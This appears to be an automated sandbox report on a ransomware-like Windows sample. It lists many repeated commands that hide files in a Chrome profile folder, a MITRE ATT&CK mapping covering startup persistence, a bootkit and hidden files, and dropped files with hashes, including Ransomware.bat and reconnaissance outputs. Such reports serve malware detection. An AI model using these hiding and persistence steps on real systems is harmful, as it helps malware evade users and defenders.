C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.png4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=8968,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7844 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
3Impair Defenses
1Disable or Modify Tools
1Pre-OS Boot
1Bootkit
1Hide Artifacts
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e5927f2.rbsFilesize
14KB
MD50a56009ab5d570220ef4460159659cfb
SHA178f3e869b34f7a0f4f4c3ba17a27e5b1b906a8ea
SHA256cbe37af83ed73e9e750577aa355643c87b50a3749c1a965d9923d1642029e656
SHA51261f28ba390e34c97318a8f583a837e38fbcd0c6d8d63732f4c005933e06bf4bf9a81c469dff839e596e7879b83e81f18759924b1fd8199d868ac567ea4a75ac8
-
C:\Program Files\AESCrypt\AESCrypt.dllFilesize
136KB
MD5ff91c1c5852c1b87a75d92070793dbf9
SHA1e37c4873e1e11b6a38291a2fcea9710181e03d5a
SHA25671020aa19597ac2d7ada376b244d71bda8e747c640735390804d1e163297ab07
SHA512a3170a0685560e4d1f9d3b50b200475667f27d529c9fa0d2cb9757633e81c5af2ef4bbe6dd60bdac478cd7bd74e9cec7d000ed79a7e341eb851a6f733e965761
-
C:\Users\Admin\3D Objects\65657421881128013.cmdFilesize
1KB
MD52edb7bd85e9fa54212622d2a427c1fab
SHA129adfe4c983f7d83c9e2b73d6b55a90fe3e4e0c6
SHA2560345f2314ae8b0f9c2248f640e11c5cd0eab8d61dc023671fa2ab5d7fb484b76
SHA5122d71d743f761c439392467bcb7f0b00d53f55726faeccc30cccfbd22bce7eaf7ef33c78d0825c4e59ef7ea4097ec25e1ce951e4c29fe3a1c797e38c4022ae5a1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\6578254637456475426.vbsFilesize
124B
MD59453e34c636daff849587f3960431fdb
SHA14d1b014132edcffb1aa32eab7219c8864c3e53bf
SHA25613cb988b8830ec992a86addc14feeadeaf48b56a7c7b8d5206e1f152d5ec609e
SHA512ed8c13b0bedee07414cc8c19f8c42eae372f9c576c891a1273270a1b92d069f722030f23e319d19c43974d478bfb79418bc5e28e5c82cdea78a9da1a4cf9a4cf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Do_Not_Delete..fileFilesize
7KB
MD56557f843f82ebfd1485db05afcf100f5
SHA1d6ac0396e0c272965e1c06a23686dabd1458dd35
SHA2563ea783d0bf58edb0f809f6780c0eeabcc27cc8f47cc2e49f70a280d0c47c6fcb
SHA512ca24ae04db5b85711e99d8204b8f32e499ddce6218473063d04b6e4b55376b275986c6a20de519f1a748f73af69469f3b3b449f1860e56a01f3627ae979dcc1d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Do_Not_Delete..fileFilesize
39KB
MD5b9181cda90e703f5cc7eaf317989c8a2
SHA165f81a31b2a38d61124cadff903b5347ee206e42
SHA256cda8823af359bb6201d43199bf6ce5daace44a7645553445032b06bf57bdcb7e
SHA5124ddc85c53e348b74734fc7bc0224622c66084bd036c86bc6824b08718367683fe46ef0efa3e0c5799e41a54ad412861a5ff4d2d4aceb3574625ddd291296b1eb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Do_Not_Delete..fileFilesize
808KB
MD5316243adf226653df2328578896da37b
SHA1ec9c5c760e80cff4077a7156c4516a655c3d537c
SHA2562e393cf5514592293fa3ab8f54bde1bf0596185d26fec8c47b4b18623db6eefd
SHA51285020ef6d10916f4b771d7986f95bac859e061fa292048309761a8fa71324ddb339937d3e2cdbca9551e894e9b70a698bc78800064c90aeac37d0c541bb4700b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeFilesize
606KB
MD5c45418ac1005a3ff20cb2f6b279c0a0f
SHA1db12795b126cb1e77a8a21395f2c92ee3ddd81a4
SHA2564d7d6c87bc5fcd25943229ac6008a15cd12e9291183ef49573ce1df521274bec
SHA5124781c66d06a94eee0d23dbaf58393811c8822875d669fd03cfa51b73bc6ab1dfaf7b31f00c10dc4b20039f7fe5eab4e58eeb128a23184f81230b0dd3aa01c79f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
4KB
MD56664aa38d70adff8844af920a2782f29
SHA19637836220e35b3ee2b5e3f7cc1ee6d1618f888c
SHA2567a3d076656f1521784976590ab48e57651c35f95b0bd01694431885ef2c22a92
SHA51249de07d71f9904b108e7b92249d3fe8b599c987eae24652dec95bdc16adbc269393715c30f15f893ec5c2efa1dbb751cc4cc6d281331f4d4aa8c9ddcf7348f5a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
52B
MD501bad78a9f668f5a998261d1ba8cecb0
SHA1ef21e5355a4989e7c6bf615bbb897ac61e67819d
SHA2566a4dc82cd189b1c8c41d963d0f71e3c691c69e551bfe445cbd22680462368e1c
SHA5125f92b6d3afbc84b701414cfdcfa6680bde50d899bb7ac9d6bdbcfda6e0df574d4073aa33771622ea0e47df247a7d3701c1f040c1ddae85ff02c21c02e4cbd18b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
157B
MD5413bf0e56fe5a9769f0089fd7d9fe61b
SHA1091db3527e2bdb1d80b30bdc84ff8c8b117251d7
SHA25627ce40112e9d545020e7c6628a545375e6e2ea206e92a77a2b46ca8135d0c548
SHA5129cdc4cb5dedbb94d32043a6872806ceb7ab3c15c4746e64ce75dc49a22daeed12dc25374197605596dff98bbaea5a0aee861f77833f2cedafaf8362e4bb5eadb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
200B
MD51d7f49dfd005b8ba2d36898b536fc5b5
SHA15c66ca630dc7ca4678785bc0780f04a787176080
SHA256567324c591dd1447ef7d10fb96e47d364b720a5be2d0f47c5b35cf8eaa8905af
SHA5121ced9f45d8c4b82f241e740737b3939d2082310ffc7bcd89cca60b19969be2580d4d11ca71361b16412ff5c2e3c6cbac989d4e23e26d54f3bbe33f0b06443788
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
238B
MD574578c36aab1e98eda42396081501e35
SHA1dc0893ff51222290ef300b14bb8588ace36f5956
SHA2568e12c6b921dba172f620288f8fbe3237b7f4c301a57a61a6dc0d16f6cbfcb2f4
SHA5129062449ab25639a7b493cbc7c57d6461772f168b7677b9d4758084ee8cf70480cd46e95e9e3480bdcc04da2a137d7952b4166724d7cea3047f88b0e39d6d3de3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
286B
MD588ad9b618069051f5ecd72a44199a484
SHA1e5baa80695e098cb02acbd847cb20c357dcb12b5
SHA256fe2dec16faf54c1b6baa64d18e9a9543ee29ddfbf2b9345281cf839b51489959
SHA512ee9ef1a92a996c10fb4faeb2f8bec90a69e479cb72c94ae923dc196db8f9fb67948d2ebcfe7a58edd24fbd2691f01e0b3076c4d3412ce1ca9af1aa93f84f92d0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
327B
MD584984f2367dae015ba3692a20101e28d
SHA140123059380ff93accd6cb1135a086e92beb7f2c
SHA25605832b111cf464ff777f41d8b1bde903a600e61f1023138d58447483bbdf8d08
SHA5121883e4e7e47cffd9010cc49f6251e8d325482bebd679c2cf35b70309076ea8251b9f20d4310bb40c38e1c1a11ba221b86ef8e060650282a2f22bc3470973ddc4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
375B
MD566747490447b70bacc9981cd49eef769
SHA1509f71af346230cc91ecc49b31a34a3642183595
SHA2560768ef977a7bf9884578666b28dccb9f394e56332541fd1a649499c01015927a
SHA51299e1387db196ce11b99baca7fa87a215da979421a5df839df14c4864c90295bad6c6b42372c5a3c3dce4cff42e77bbee3304c352d4f1e61ec8a3e36f82d287e7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
422B
MD569339ff557b0cbbe7216a28c1e55f438
SHA17df6ba92e3ed349169352ee9c518c6b87d8a3bd7
SHA2565f04fcd224e2efa808b9ae54509e5281fc9bde9e92e17d6fe568871ce0420cf8
SHA512f6e50be39e99aedce927174992a4cef17b5e95fae2440924e7042d009e368aa02d15cc2d2b9d52caa65b888abde3375441ed6fe3a3034ffe2652d49982ff0c53
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
469B
MD5930aeeb1a9212e45ad19af46bc316061
SHA1fe30a541eee57f4e53d2481a8ce1f27229617647
SHA256d60560b42456486ed925f9414642fecd83f2906a591ea530d772f3deac6d9760
SHA5121edfa18443ae4ed51d259c91755b5246c673d3ab10df5b1e1130972e10d78e01add4908a3c2c68cf6f3d8e2dfe660b2afd0c2b8e858c34fd33ceea02415eede8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
519B
MD59524536dcde25aa0b01aa5a7bb9aad19
SHA13f19bc8d926ff51ef746be337c7462b36a16aad1
SHA2563da47285d5b52d83dcd13cf1cfcfbf7fc5bdcac637849b8567ba022103b04abd
SHA5126d1fdce5d91affa2869e02f0876b345f4f2bedd201f56c55552897b096a22a2f2a2d73b94d75505f3c5e0c7c80aebb434aba9a41c6b92151a91c68e2a7c832f5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txtFilesize
4KB
MD5f76f6db1b8a65932fb706c7dd8696bb3
SHA1cf91376ea2c3f0f4dc98db9706276adbd3eadafc
SHA2569748ef1f9d3f33075f2d54e5011b2fdbc142a7234ad20353528053e5e591a1bc
SHA512be1c9e23e016b641aedd8c34a3b5af8923e9be313cdc7943014fba9a64c4e4dada7e7f0bd3d6297201b5c0a90be4b2fc39322f0d06b36f2a789d03899748392d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\hdiwhduewih291.tmpFilesize
68B
MD5cb4e89835c55eff6cd1da1218b93edfa
SHA189da1c1951a6833082e2c6719049ba0f944f9458
SHA25698937c3e7dcd36aa2a8808f73f71e98504f1299690f4782884c2cbc62389d711
SHA512092dd61054a06449c719b1a29586757a95dd4151959d9ce17e87640ebc527774640c12ec9748bb91749c90c79611bd1b4266440c0ed447815c515f9fda22dc42
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\hdiwhduewih291.tmpFilesize
4KB
MD506a8df1ba362234a377218f05a4a5507
SHA1376a085aa14e848c99785319a590235d09b6e96b
SHA2566a9b837357318a85d1bacd980c1364677e54b94abc43e771aaedfa86fc3871c7
SHA51237e25eeabc16b7dcd35b7f2eb792aecf87362a8e68e1e3c42302c31fec1ea585ab6beeb6fe02b30ee3e46b7b8de99ce87161f746093a7b6e1d1346574f7a9185
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\hdiwhduewih291.tmpFilesize
162KB
MD5eac1138387121fff7f77e7597f3e3238
SHA18e54b37ff29d1345152cac08196f9f5248f32c73
SHA256608f9044473619ae53aeccba9166f89dc3475f6faca38bfd2e67b97b78fe18bd
SHA512c246a92bc3e4efdaa072d32598fdd9a4494f253876a7f40e15d23bcf561b44dee77a2a091bcb6c53083e8afc515cb0a1caeed2a16ebbc8c924542c6cd3a0501a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\monitor.batFilesize
259B
MD56cb300a0de2e5beaad0f031c32d18b78
SHA15eeb118ba21be6dc95a6294b0072301ac57ad878
SHA256abdafbed88fd62869627d51b207b3d05bcb1a13db3b13756bedad381a9eef3fe
SHA512cd414a7dac291fb51beefce8b987cc295174e84ceed6506a56435fa8d16c4e690524baa3b937ce04962bcd905cc4b23689c28fa5b31e95993c60231201e0a6c4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\monitor.batFilesize
697B
MD558bcd9d617a5e6b380a786372c7e9f33
SHA1d0aadab71fb0466c3263765a52f9018d54b72a56
SHA2569d06b8aae57a09ebfc2dc006b59a982fe95450d5f26a0458dccf426e815eb14e
SHA512b40816442cd8b7486888ccf4b927d3278fc9b153981e4e86e3431216a268af9e8eb0b7e8d624a0d2a3d2590d3028486d334db651da6f28cd69cf8bb70ffc72d6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\s.exeFilesize
116KB
MD55ed4728caa339c2a7479102f0c04c087
SHA120cd453fcac9d9960b0076715d985a55784a6b53
SHA2567160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c
SHA512a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f3f8be02b8064bf22cc00e558c40704a
SHA15c6a63375a3396fdee9ffbe906b47195f13a89b4
SHA25673606ba7e98faaff18974b983568e55d6a3b07e8469f2b06f5d765db87f40e07
SHA51224caeb058c651c9c1dd8ee7ea04384829355193a20e964c449ee69ae3bfde12e0916491adcd31a85f405e8afa6db30a05eca5f61d4a62041b55872013b776292
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58af179b95a97902892d7f3f3049822c1
SHA15a1e5ee1e7510db1ba3bb3b0f80649bf86d5628f
SHA2569d8fd99d002d67a5454732969bc220094dc1f6ffd51d8036d28e97885d688f6c
SHA512028f3f23b3c08d22c4a89097d925e5bb74664f7f8eac8b3830198c2b26f6a16001cc750a307c33531ffaa22f74ea793bf9312fe83d92b37cc4ba62f95eacdcfd
-
C:\Users\Admin\AppData\Local\Temp\MSIE402.tmpFilesize
231KB
MD55494165b1384faeefdd3d5133df92f5a
SHA1b7b82805f1a726c4eee39152d1a6a59031d7798c
SHA256ba0ad3a4d2112b269e379a2231128e7ebe23e95d5d04878d6ee8815e657bb055
SHA512ecd5012df2a060fa58664e856a84716f162d3420e7a7a1368612451ec65f2dcd674c7031d780a6c9d357700f6baeb31325748bc29270850ee4070079f15be613
-
C:\Users\Admin\AppData\Local\Temp\VSD873C.tmp\vcredist_x64\vcredist_x64.exeFilesize
5.5MB
MD5778690eb100740c03f71597fd5ba2347
SHA146d9ef194c59ac2d514b9621f1f27329bfbb8e1a
SHA2563ced60e566e9c74806db8739663b27d06012cc6b6ee5b28eaa2afce5514bcacf
SHA512184f342e7f2d34f315ec29bdb7438426b0bbc698443b34242f3cc1947c984eb52b909b1e26d4b510916ac1cc6e3fd18679d691f556f25f1673268a2d2835d287
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45px3ujf.htb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnkFilesize
941B
MD5713c1e6769c5add2b0bc6b1188700663
SHA147e58a121e4a1de63b6210ae7921071fd3613706
SHA2567b41300434a882cfaec9327e4d8453eaeae5c567c1d09f2271e4be36e715aae7
SHA512ce2f76266ba2b984e3bf78e4317cd4d316a789cbc48a00305a833f3f5e349b415c0a78e2619353a57ff3774861fd825c569b1078d15d65843a38b2da5d9690dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnkFilesize
955B
MD51a3e19b42740b937a3019d22614a2ed7
SHA1222effdcd4eae836c63fa0d3e3047fe66a99d58b
SHA256aca16bdf52dc99fe31aeee4bc5fdf75cb6c4a3209a4ab547f316ebbd777e1568
SHA512a3e1ad579158af08933db453c5db11c5a5b3bf2efae84665dd464e8f5c3dd124cb48261bb84f2c901ad86822f93b86061b1c191e5347a5d556e2cd0b4857999c
-
C:\Users\Admin\AppData\Roaming\cmdkey.txtFilesize
309B
MD57ef769291b429c1d02ebc652e96421bc
SHA14f5e187ea57c9007c51d364d4fc6198fa9b53104
SHA2569592ae5ceb2a8d9c973a2109d3f98053a072816bc0651824b256abd323fd77f1
SHA512ce969794d8ffc0cc9761568b4a2452f81ec88bb0a49b497cc7d2ee707d94232e363ca072d5a8f563af2d51741e672a5b647297dd4d79b96e3d2ebfc75e301812
-
C:\Users\Admin\AppData\Roaming\ipconfig.txtFilesize
1022B
MD56b35a54638243336ffe4950991262f0f
SHA19357ec8f8139609e2b22f44d9346175513c8802c
SHA256bbde3cb388c064583fc7454e4ae97ae03593353bc1c9373c6b1a6a9bec5f615b
SHA5122f70055de663658d93ad5fd497ae8025c95af0981fe0e1fc8d11588a7b7443de6fc20fab45dad7af85f3e88b2b2cb82c581a35152416681062459b884654ea74
-
C:\Users\Admin\AppData\Roaming\netuser.txtFilesize
283B
MD581bff62eddeb29e31acdd0a8cd9e08a1
SHA17189b8e1de22688f37ab10e901a7c3873c4d92fb
SHA256f2dfe38b6d15c2b2d39ee11f455a7fb7b2d17cba6e70903ae6856516a4248760
SHA5126575ae2b1e74eb31b7b87bed94ab492b78383cb0b897c085c1c965077ed9c8c66e7c474f8cea0b56e1ec37642a086a9abb0267c950f15d0ba000a3efab011c3e
-
C:\Users\Admin\AppData\Roaming\quser.txtFilesize
160B
MD57da09b51c9829e625c891d0da46cb74e
SHA1190fda87256b80e5b6472f90a95c846b0311accc
SHA256a208430642137c92f1ca4e691dde5b465c0a87a853b8f863c74fba83bf5cda5d
SHA5120041a980cc889fc1b831a9bdab89daa310adf8a4d3834e2656f21d13298a18a1b1a9eb9f45da42d98f6e7d32e406c012f798967da50c8146a08180571477b0c7
-
C:\Users\Admin\AppData\Roaming\stup.txtFilesize
247B
MD56a961d34141e43c89d4ea20f647ffcb2
SHA13dec2260d2ff0b53397c417d5c751619347f7e31
SHA256f8aca28514ddf0a14d24a5919ec28929515f6cb2417e02a33c7b9d858361797b
SHA512d5ae84aa841dc7b628cbb256f39c443318dbd1f93090c5e57eb21643d0bfdc1bdc80ba1363b4a61a32316f6a2a689a6970f0db93b759be33d5f333a7fa7f0314
-
C:\Users\Admin\AppData\Roaming\sysinfo.txtFilesize
2KB
MD5ed644c12ad7a95cc2e9de942f3ec02a9
SHA1d4d94cbc3650ac2787789d784c9c013742fff19e
SHA2566eb7f2b225b6668b0d58f0df15e46780d374a8db275ca2058fb488b42fbcb240
SHA5127a976088710067d303eac148db7b85446e297f700fe9f735fa6ea87e3d580317f157678af4a0cbcee91887a59af9a287cec21ff1237916757f4f5edaf1669a72
-
C:\Users\Admin\AppData\Roaming\tasklist.txtFilesize
8KB
MD5defa17db525b3b6cc982bd87d9d3c636
SHA1e7f51d1a638f8950134151a2f616653eea039410
SHA256ef19cdadc5c51e6cde5be652c778ea713109b02d137f0b59a0e6b9cd42b0238d
SHA51270774c903682732b32e638b1fccd3b5bf7ea570d6d5cbe113645493f0684e2d940656dd9edf684c652213e8e38dc876a31cd54cc322a4e79e25993385a5bfcf9
-
C:\Users\Admin\AppData\Roaming\tasklist.txtFilesize
8KB
MD5668bb7e5432c0d24c5855d9041edc24a
SHA1b64738445f899c7db83d71bcb39f3f6e74d95330
SHA25609ad426c795b1c6e45304ac0de3767b346dbbd691c32f2e4d1348929bea29d18
SHA512f09f6b76ccfaf7737194de602977a3ca3ae736333aa5d6144605bb93f0377bdc57ee87023925b072437670aa4e2c1389bb28bfb3575b02124a1fec5180556cf1
-
C:\Users\Admin\Desktop\CS2.vbsFilesize
392B
MD5dca4a80353f239d3139be32e7983666c
SHA1005eb7a067ad1c8ef4b7d6ee93873f92e02a104b
SHA256fc0e5f3dbcd68f8ec358e3d4100bccf59cfc007984e999aede9514e84d9cf393
SHA5124756aef45896e2f622fe536805c9f749d203a45d693d7c714948e4ca1b81271f5c99c1c24f4e58a5fdc2db7756bee930d01e93f8923a16c136440c1ef2a829d4
-
C:\Users\Admin\Desktop\CS2.vbsFilesize
395B
MD5a9d338340439d9300c5cecf699d52980
SHA1807c5fb4949719e0f5d353c73350595be8591fea
SHA2560d1d78a9880ecc17e340e50b3ba1415814e9771ad4a109e20505c4cea6e21e11
SHA512dab94d8df8b3973e0ee4a80b38510c6033034c52d4ca0145842edfb24720b0d1e3449839b80910b838c8e3f27020a4a1c86196696db011405b668237815c383e
-
C:\Users\Admin\Desktop\Do_Not_Delete.tmpFilesize
872B
MD5a6482d59879d22f482df031871f59b25
SHA1709dbc8382e47dda399fdcbd853ee743a4b7fa0e
SHA2569a9523a1377cb68331edc22e93886325661997ca836d86f8edb93ec1b0533247
SHA5127c44264f03d09d11abc3171bcb1dc20dfe51e6e66b37813fa2ebba71441ba1aa58854ad2ab5820a99c9c582be23c7f15ad6ee9a73eb6db03a0ed45a48a37cafd
-
C:\Users\Admin\Desktop\Do_Not_Delete.tmpFilesize
7KB
MD5c20aca990186b22221ff55a6bdd7b640
SHA1317efa972889b89a7d6291888a652ed98f2826b3
SHA2561749ffe93e05c24decbe0e2e4f9a5db765eca82fb5f202e6445d3a7a76b78d68
SHA51204246b03dee5460d4285306a3e0928494efd822f145f0662cd94223d3a77bcf7c76504a4a9524e2526fd4f9d757b0e200e14c215e3f15c1466bc2eb418d5cf47
-
C:\Users\Admin\Desktop\Do_Not_Delete.tmpFilesize
9KB
MD5497d6d4fc689b9092ea537a5dd89c2f6
SHA147f9d393f4cac8a3b63dcb8716991640eb44c9da
SHA25698ad2d4c82cbc6cdffe7ed6ec980fcfc34ef9a0508512fefdefbea6a889aa577
SHA5127a3ef1fe1de8b036d9e978159cb7118aaba4c5ff70928a6af1857aa8d3acebdb457684d032776553f193dd7411047a38ea856a834cd71cc1c76e96627415c881
-
C:\Users\Admin\Desktop\Do_Not_Delete.tmpFilesize
7KB
MD531a1189cddbf09c725da9b54e4fda2dd
SHA1946066441200dfa1c4e4895cac35cc258ab5558f
SHA2562f1f04ea9a397a73675cabdf8a6b61812877484dcc5dfc5284fd0f74eb213e9c
SHA5125cbf57b9d728eb2ebdf4127e2e7f860e85aff0bd6ab6545def03cd51814392b0a011034e0abf1f5b12263f688b9af444d861d7c12f7f6d052e9d65e8d3236414
-
C:\Users\Admin\Desktop\Do_Not_Delete.tmpFilesize
10KB
MD51163155fc77f27fac77bb8d47f3f4dc4
SHA12c2d96b60ae40d87c01e2bc8e34f3fa2fd01e505
SHA256fa68d6521e6e2c312bdf1238941bccd082148ac925e39dd316eb6605c96ab537
SHA512782a1f0af1720cee6b0f41415953db6c1557796e93436dcaa1d8eb4533b9b41e04ed68c9e87933f5562d17e93c869c4375d6ac57de7a84c4908d95a01d2c316c
-
C:\Users\Admin\Desktop\Ransomware.batFilesize
1KB
MD5adcc89dbcbdc72ca4461dbad8a82a38c
SHA13aa10aed9b791ed7bbca6fd6e42335c90b26418d
SHA2567b666df45cfe6410b52a2dd8132e3fd980331f7ef479e88ac4e385f59a4cdbb9
SHA5124d5862c400679cf1999807430f07327c056d19a0f2f2021096bc4bfec11121585a2ae90fa1a288494083e6f982ea690c11376c33a8f396b66bb450b02293ca5a
-
C:\Users\Admin\Desktop\cmd.txtFilesize
1KB
MD50f3738be5102704fea61648da7f7bbd6
SHA1f55b564f32ecbfce149ce2aef9eeb8cdd4ccc7d1
SHA2563c14cd9fa7445ac4123d8b750caf3ed6ca24f1053b28b3962299c6a29dc71101
